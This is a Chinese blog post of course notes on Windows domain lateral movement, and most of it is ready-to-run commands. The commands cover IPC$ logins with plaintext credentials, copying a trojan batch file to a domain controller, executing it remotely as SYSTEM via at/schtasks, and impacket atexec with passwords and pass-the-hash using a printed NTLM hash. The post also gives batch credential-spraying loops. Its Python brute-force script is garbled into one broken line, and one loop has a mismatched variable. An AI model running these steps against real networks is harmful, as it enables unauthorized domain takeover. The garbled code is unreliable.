内网渗透-at&schtasks

!–看小迪老师的课程自己做的笔记

一、信息收集

1、已经拿下一台内网主机,对域控进行信息收集

net user /domain    #查看域控账号

2、对域控主机名进行ping,查看域控ip

ping 主机名

拿到域控ip:192.168.139.128

3、对域控ip进行namp扫描

nmap -T4 -A -v 192.168.139.128

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Y84gxMNQ-1666782771965)(…/…/img/image-20220402181349877.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mHXMCPiD-1666782771966)(…/…/img/image-20220402181748976.png)]

445端口开放,系统为windows 2012 R2

二、域横向移动【明文】(at&schtasks协议)

1、建立ipc连接

net use \\192.168.139.128\ipc$ "password" /user:domain\administrator  #域内连接
net use \\192.168.139.128\ipc$ "password" /user:administrator       #工作组连接

注意:几种错误连接错误码

(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限

(2)51:网络问题,Windows 无法找到网络路径

(3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有

防火墙等问题

(4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$

(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除

(6)1326:账号密码错误

(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况

(8)2242:用户密码过期,目标有账号策略,强制定期更改密码

2、拷贝要执行的命令脚本到域控

dir \\192.168.139.128\C$\    #查看域控c盘目录
copy C:\muma.bat \\192.168.139.128\C$    #复制文件到域控

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ChIfmCru-1666782771967)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402183539779.png)]

3、查看目标时间,定时任务(at&schtasks)

net time /domain     #查看域控时间
at \\192.168.139.128 18:40 C:\muma.bat   #系统小于windows2012
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn adduser /sc DAILY /tr C:\muma.bat /F #系统大于等于windows2012 创建adduser对应执行文件
schtasks /run /s 192.168.139.128 /tn adduser /i  #运行adduser任务

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nwqcQgnw-1666782771968)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402185723553.png)]

4、删除计划任务

schtasks /delete /s 192.168.139.128 /tn adduser /f #删除adduser任务

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yv1r6juD-1666782771968)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402190014138.png)]

三、域横向渗透明文HASH传递atexec-impacket

1、使用atexec明文

先删除之前的ipc连接

net use \\192.168.139.128 /del

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VwEKjir6-1666782771969)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402190831235.png)]

使用atexec传递明文

atexec.exe 目标用户名:密码@目标ip "执行的命令”
atexec.exe administrator:admin.root.123@192.168.139.128 "whoami"    #工作组
atexec.exe GHY/administrator:admin.root.123@192.168.139.128 "whoami"  #域

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HJgewCN0-1666782771970)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402191528572.png)]

自动提权到SYSTEM

2、使用atexec 进行传递HASH

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VvIsd35o-1666782771971)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220406092225030.png)]

NTLM:09731bc87db0aeb71e040f42978b3de1
atexec.exe -hashes :09731bc87db0aeb71e040f42978b3de1 ./administrator@192.168.139.128 "whoami"
atexec.exe -hashes :09731bc87db0aeb71e040f42978b3de1 GHY/administrator@192.168.139.128 "whoami"
#空格不能少!!!!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KrYhU83l-1666782771971)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220406092034994.png)]

四、批量利用

批量获取域内存活ip

for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.139.%i | findstr "TTL="

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2wcp21P1-1666782771972)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402200639098.png)]

批量检测ipc

for /F %i in (ips.txt) do net use \\%i\ipc$ "admin.root.123" /user:administrator  #批量检测ip对应的明文连接(工作组)
for /F %i in (ips.txt) do net use \\%i\ipc$ "admin.root.123" /user:GHY\administrator
#批量检测ip对应的明文连接(域)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-arlzJD8t-1666782771972)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402202637032.png)]

for /F %i in (ips.txt) do atexec.exe ./administrator:admin.root.123@%i "whoami" #批量检测ip对应明文回显版(工作组)
for /F %i in (ips.txt) do atexec.exe GHY/administrator:admin.root.123@%i "whoami"
#批量检测ip对应的明文回显版(域)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EtgOGbrV-1666782771973)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220405185658067.png)]

for /F %i in (pass.txt) do atexec.exe ./administrator:%i@192.168.139.128 "whoami"
#批量检测明文对应ip回显版(工作组)
for /F %u in (pass.txt) do atexec.exe GHY/administrator:%i@192.168.139.128 "whoami"
#批量检测明文对应ip回显版(域)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PoFtfCqD-1666782771973)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220405190612253.png)]

for /F %i in (hash.txt) do atexec.exe -hashes :%i ./administrator@192.168.139.128 "whoami"
#批量检测hash对应ip回显版(工作组)
for /F %i in (hash.txt) do atexec.exe -hashes :%i GHY/administrator@192.168.139.128 "whoami"
#批量检测hash对应的ip回显版(域)

五、整体批量化

#net user \\192.168.139.128\ipc$ "admin.root.123" /user:GHY\administrator
#pip install pyinstaller
#pyinstaller -F ipc.py
import os,timeipc={'192.168.139.1','192.168.139.2','192.168.139.128','192.168.139.131','192.168.139.133'
}passw={'ghy00925','ghy.root','ghy.root.234','ghy.root.123','ghy.root.456','admin.root.123','ghy.haha.925'
}username={'administrator','root','admin','admin123','ghy','gao','gaohongyu','boss'
}for ip in ipc:for passwords in passw:for user in username:exec = "net use \\" + '\\' + ip + '\ipc$ ' + passwords + ' /user:GHY\\' + userprint('-->'+exec+'<--')os.system(exec);

内网渗透-atschtasks相关推荐

  1. kali扫描内网ip_来,我们聊聊内网渗透!

    文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...

  2. [原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案)

    [原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) 参考文章: (1)[原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) (2)https://www.cnblogs.co ...

  3. 红蓝对抗 linux内网渗透

    目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...

  4. 内网渗透测试:NTLM Relay攻击分析

    目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHa ...

  5. 内网渗透测试:内网信息收集与上传下载

    在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...

  6. 安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...

    1 基础知识 1.1 网络 熟悉常见网络协议: https://www.ietf.org/standards/rfcs/ 1.2 操作系统 1.3 编程 2 恶意软件分析 2.1 分类 2.1.1 木 ...

  7. 【内网渗透工具】炫彩蛇安装教程

    点击查看[学习资料] Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper ...

  8. 【内网渗透】利用非常规手段突破安全策略上线CS

    前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...

  9. 【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控

    内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 [查看资料] 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路 ...

最新文章

  1. 12款很棒的浏览器兼容性测试工具
  2. JavaScript学习笔记(备忘录)
  3. 【Java数据结构】3.1 顺序栈
  4. C#中常用的几种读取XML文件的方法
  5. 序列化对象C++对象的JSON序列化与反序列化探索
  6. 如何在没有数组和string字符串的条件下输入时间(去时间的分号)
  7. Python案例:求满足条件的人数
  8. MFC开发IM-第十篇、MFC改变static text颜色
  9. 代码的c++实现_一文带你快速理解FreeRTOS代码规范~
  10. opencv imshow plt imshow
  11. fiddler抓包工具1
  12. 研究了EXCEL的行高问题
  13. Java将彩色PDF转为灰度
  14. 模电实验报告:单级共射放大电路
  15. help用法总结(基于材料:“老托福听力93篇”)
  16. Github标星25K+超火的Android实战项目,2022BTAJ面试真题详解
  17. marvin java_JAVA使用Marvin在图片中搜索图片
  18. 奇特的一生 柳比歇夫坚持56年的“时间统计法” - 读后感
  19. 涛涛最近要负责图书馆的管理工作,需要记录下每天读者的到访情况。每位读者有一个编号,每条记录用读者的编号来表示。给出读者的来访记录,请问每一条记录中的读者是第几次出现?
  20. Git:git-pull 的用法总结

热门文章

  1. 车载双目ADAS(八):双目相机对图像画质要求
  2. 使用java实现HTTP的GET请求
  3. 机械振动 趋势项产生原因
  4. TensorFlow实战(四)——交通标志牌(BelgiumTS交通数据集)的识别(一)
  5. 计算机 无法 访问共享网络打印机,电脑无法共享局域网打印机和文件的解决方法...
  6. 教务管理系统实现1-账号登陆
  7. Unity XR Interact Tookit使用
  8. html ul li 行显示li 间距,[ 求助 ] 让ul li缩小行间距的CSS代码是什么?
  9. 这款苹果AirPods Pro耳机真香,写Bug神器!包邮送你一个!
  10. mysql encrypt_MySQL DES_ENCRYPT()用法及代码示例